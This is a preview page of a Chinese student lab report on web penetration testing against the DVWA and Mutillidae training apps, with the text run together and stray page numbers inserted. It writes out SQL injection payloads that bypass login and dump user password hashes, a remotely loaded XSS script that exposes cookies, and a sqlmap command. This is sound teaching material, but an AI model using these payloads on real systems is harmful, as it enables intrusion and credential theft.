欢迎来到天天文库
浏览记录
ID:14058853
大小:1.67 MB
页数:18页
时间:2018-07-25
《web应用程序渗透测试》由会员上传分享,免费在线阅读,更多相关内容在行业资料-天天文库。
1、Web应用程序渗透测试姓名:滕召维学号:13084139一、实验目的1.学习使用OWASPBWA靶机。2.学习使用KaliLinux进行Web应用程序渗透测试。二、实验内容1.使用w3af漏洞扫描器对OWASPBWA靶机进行漏洞扫描。2.根据老师的课堂讲授,按照课件相关内容在OWASPBWA靶机上实践XSS和SQL注入两种攻击。3.配合使用TamperData和sqlmap进行sql注入攻击。4.利用文件上传漏洞植入Webshell。三、主要实验结果(一)使用w3af漏洞扫描器对OWASPBWA靶机进行漏洞扫描1.启动w3af漏洞扫描器。2.编辑新建的Profile,也就是配置
2、各种插件。对audit类插件勾选sqli和xss两个插件,如下图:对crawl类插件只勾选web_spider,如下图18对web_spider的配置在窗口右侧,勾选only_forward并保存,如下图对output类插件,只勾选输出html文件。对输出文件的配置在窗口右侧,如下图输入文件名称并保存。这样扫描结果将保存在/root/dvwa.html文件中。4.如下图在Target一栏输入扫描的网址,单击右侧按钮start启动扫描。扫描过程中18扫描结果18(二)在OWASPBWA靶机上实践XSS和SQL注入两种攻击1.在KaliLinux攻击主机上,按照课件第29页,实践“
3、通过SQL注入攻击绕过身份认证机制”。182.XSS和SQL注入攻击(1)在攻击机上访问http://www.dvssc.com/dvwa,按照1.的攻击方法,登录进入DVWA训练系统。18(2)首先按照图示将DVWA应用的安全等级设置为Low。(3)按照课件29-31页,实践SQL注入攻击。使用OWASPBWA靶机的DVWA应用程序演示如何获取后台数据库更多的信息。输入文件“XSS&SQLi.txt”中的脚本。将数据表中的每一行都显示出来,输入:'or'1=118查询INFORMATION_SCHEMA系统表,输入:'UNIONSELECT1,table_namefromIN
4、FORMATION_SCHEMA.tables--'列出user表的内容,输入:'UNIONSELECT1,column_namefromINFORMATION_SCHEMA.columnswheretable_name='users'--'18④取得口令的MD5值,输入:'UNIONSELECTNULL,passwordfromusers--'⑤使用concat()函数将所有的信息都列出来,输入:'UNIONSELECTpassword,concat(first_name,'',last_name,'',user)fromusers--'18(4)按照课件第40页,实践反射式
5、XSS攻击。输入输入(5)按照课件第43页,访问http://www.dvssc.com/mutillidae,登录进入mutilidae训练系统,实践存储式XSS攻击。访问Mutillidae的CrossSiteScripting(XSS)输入:xss.js的内容如下:document.write("Thisisremotete
6、xtviaxss.jslocatedatha.ckers.org"+document.cookie);alert("Thisisremotetextviaxss.jslocatedatha.ckers.org"+document.cookie);首先按照sql注入攻击登录进入mutilidae训练系统18输入:document.write("Thisisremotetextviaxss.jslocatedatha.ckers.org"+document.cookie);al
7、ert("Thisisremotetextviaxss.jslocatedatha.ckers.org"+document.cookie);(三)配合使用TamperData和sqlmap进行sql注入攻击18重复(二)中步骤2-(1)和2-(2)。启动TamperData插件。4.按照课件33页使用Sqlmap进行SQL注入攻击。(1)扫描,输入:sqlmap-u'http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=aa&Submit=Sub
此文档下载收益归作者所有